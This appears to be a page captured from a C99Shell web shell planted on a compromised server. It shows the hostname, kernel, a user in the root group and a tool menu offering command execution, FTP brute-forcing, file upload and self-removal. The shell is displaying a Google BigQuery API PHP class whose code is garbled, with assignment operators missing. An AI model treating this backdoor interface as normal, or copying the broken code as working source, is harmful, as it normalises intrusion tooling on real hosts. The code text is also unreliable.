!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smm.picotech.app/public_html/vendor/google/apiclient-services/src/Bigquery/   drwxr-xr-x
Free 28.7 GB of 117.98 GB (24.32%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ExternalDataConfiguration.php (7.44 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 * Copyright 2014 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License"); you may not
 * use this file except in compliance with the License. You may obtain a copy of
 * the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
 * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
 * License for the specific language governing permissions and limitations under
 * the License.
 */

namespace Google\Service\Bigquery;

class 
ExternalDataConfiguration extends \Google\Collection
{
  protected 
$collection_key 'sourceUris';
  
/**
   * @var bool
   */
  
public $autodetect;
  protected 
$avroOptionsType AvroOptions::class;
  protected 
$avroOptionsDataType '';
  protected 
$bigtableOptionsType BigtableOptions::class;
  protected 
$bigtableOptionsDataType '';
  
/**
   * @var string
   */
  
public $compression;
  
/**
   * @var string
   */
  
public $connectionId;
  protected 
$csvOptionsType CsvOptions::class;
  protected 
$csvOptionsDataType '';
  
/**
   * @var string[]
   */
  
public $decimalTargetTypes;
  
/**
   * @var string
   */
  
public $fileSetSpecType;
  protected 
$googleSheetsOptionsType GoogleSheetsOptions::class;
  protected 
$googleSheetsOptionsDataType '';
  protected 
$hivePartitioningOptionsType HivePartitioningOptions::class;
  protected 
$hivePartitioningOptionsDataType '';
  
/**
   * @var bool
   */
  
public $ignoreUnknownValues;
  protected 
$jsonOptionsType JsonOptions::class;
  protected 
$jsonOptionsDataType '';
  
/**
   * @var int
   */
  
public $maxBadRecords;
  
/**
   * @var string
   */
  
public $metadataCacheMode;
  
/**
   * @var string
   */
  
public $objectMetadata;
  protected 
$parquetOptionsType ParquetOptions::class;
  protected 
$parquetOptionsDataType '';
  
/**
   * @var string
   */
  
public $referenceFileSchemaUri;
  protected 
$schemaType TableSchema::class;
  protected 
$schemaDataType '';
  
/**
   * @var string
   */
  
public $sourceFormat;
  
/**
   * @var string[]
   */
  
public $sourceUris;

  
/**
   * @param bool
   */
  
public function setAutodetect($autodetect)
  {
    
$this->autodetect $autodetect;
  }
  
/**
   * @return bool
   */
  
public function getAutodetect()
  {
    return 
$this->autodetect;
  }
  
/**
   * @param AvroOptions
   */
  
public function setAvroOptions(AvroOptions $avroOptions)
  {
    
$this->avroOptions $avroOptions;
  }
  
/**
   * @return AvroOptions
   */
  
public function getAvroOptions()
  {
    return 
$this->avroOptions;
  }
  
/**
   * @param BigtableOptions
   */
  
public function setBigtableOptions(BigtableOptions $bigtableOptions)
  {
    
$this->bigtableOptions $bigtableOptions;
  }
  
/**
   * @return BigtableOptions
   */
  
public function getBigtableOptions()
  {
    return 
$this->bigtableOptions;
  }
  
/**
   * @param string
   */
  
public function setCompression($compression)
  {
    
$this->compression $compression;
  }
  
/**
   * @return string
   */
  
public function getCompression()
  {
    return 
$this->compression;
  }
  
/**
   * @param string
   */
  
public function setConnectionId($connectionId)
  {
    
$this->connectionId $connectionId;
  }
  
/**
   * @return string
   */
  
public function getConnectionId()
  {
    return 
$this->connectionId;
  }
  
/**
   * @param CsvOptions
   */
  
public function setCsvOptions(CsvOptions $csvOptions)
  {
    
$this->csvOptions $csvOptions;
  }
  
/**
   * @return CsvOptions
   */
  
public function getCsvOptions()
  {
    return 
$this->csvOptions;
  }
  
/**
   * @param string[]
   */
  
public function setDecimalTargetTypes($decimalTargetTypes)
  {
    
$this->decimalTargetTypes $decimalTargetTypes;
  }
  
/**
   * @return string[]
   */
  
public function getDecimalTargetTypes()
  {
    return 
$this->decimalTargetTypes;
  }
  
/**
   * @param string
   */
  
public function setFileSetSpecType($fileSetSpecType)
  {
    
$this->fileSetSpecType $fileSetSpecType;
  }
  
/**
   * @return string
   */
  
public function getFileSetSpecType()
  {
    return 
$this->fileSetSpecType;
  }
  
/**
   * @param GoogleSheetsOptions
   */
  
public function setGoogleSheetsOptions(GoogleSheetsOptions $googleSheetsOptions)
  {
    
$this->googleSheetsOptions $googleSheetsOptions;
  }
  
/**
   * @return GoogleSheetsOptions
   */
  
public function getGoogleSheetsOptions()
  {
    return 
$this->googleSheetsOptions;
  }
  
/**
   * @param HivePartitioningOptions
   */
  
public function setHivePartitioningOptions(HivePartitioningOptions $hivePartitioningOptions)
  {
    
$this->hivePartitioningOptions $hivePartitioningOptions;
  }
  
/**
   * @return HivePartitioningOptions
   */
  
public function getHivePartitioningOptions()
  {
    return 
$this->hivePartitioningOptions;
  }
  
/**
   * @param bool
   */
  
public function setIgnoreUnknownValues($ignoreUnknownValues)
  {
    
$this->ignoreUnknownValues $ignoreUnknownValues;
  }
  
/**
   * @return bool
   */
  
public function getIgnoreUnknownValues()
  {
    return 
$this->ignoreUnknownValues;
  }
  
/**
   * @param JsonOptions
   */
  
public function setJsonOptions(JsonOptions $jsonOptions)
  {
    
$this->jsonOptions $jsonOptions;
  }
  
/**
   * @return JsonOptions
   */
  
public function getJsonOptions()
  {
    return 
$this->jsonOptions;
  }
  
/**
   * @param int
   */
  
public function setMaxBadRecords($maxBadRecords)
  {
    
$this->maxBadRecords $maxBadRecords;
  }
  
/**
   * @return int
   */
  
public function getMaxBadRecords()
  {
    return 
$this->maxBadRecords;
  }
  
/**
   * @param string
   */
  
public function setMetadataCacheMode($metadataCacheMode)
  {
    
$this->metadataCacheMode $metadataCacheMode;
  }
  
/**
   * @return string
   */
  
public function getMetadataCacheMode()
  {
    return 
$this->metadataCacheMode;
  }
  
/**
   * @param string
   */
  
public function setObjectMetadata($objectMetadata)
  {
    
$this->objectMetadata $objectMetadata;
  }
  
/**
   * @return string
   */
  
public function getObjectMetadata()
  {
    return 
$this->objectMetadata;
  }
  
/**
   * @param ParquetOptions
   */
  
public function setParquetOptions(ParquetOptions $parquetOptions)
  {
    
$this->parquetOptions $parquetOptions;
  }
  
/**
   * @return ParquetOptions
   */
  
public function getParquetOptions()
  {
    return 
$this->parquetOptions;
  }
  
/**
   * @param string
   */
  
public function setReferenceFileSchemaUri($referenceFileSchemaUri)
  {
    
$this->referenceFileSchemaUri $referenceFileSchemaUri;
  }
  
/**
   * @return string
   */
  
public function getReferenceFileSchemaUri()
  {
    return 
$this->referenceFileSchemaUri;
  }
  
/**
   * @param TableSchema
   */
  
public function setSchema(TableSchema $schema)
  {
    
$this->schema $schema;
  }
  
/**
   * @return TableSchema
   */
  
public function getSchema()
  {
    return 
$this->schema;
  }
  
/**
   * @param string
   */
  
public function setSourceFormat($sourceFormat)
  {
    
$this->sourceFormat $sourceFormat;
  }
  
/**
   * @return string
   */
  
public function getSourceFormat()
  {
    return 
$this->sourceFormat;
  }
  
/**
   * @param string[]
   */
  
public function setSourceUris($sourceUris)
  {
    
$this->sourceUris $sourceUris;
  }
  
/**
   * @return string[]
   */
  
public function getSourceUris()
  {
    return 
$this->sourceUris;
  }
}

// Adding a class alias for backwards compatibility with the previous class name.
class_alias(ExternalDataConfiguration::class, 'Google_Service_Bigquery_ExternalDataConfiguration');

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0105 ]--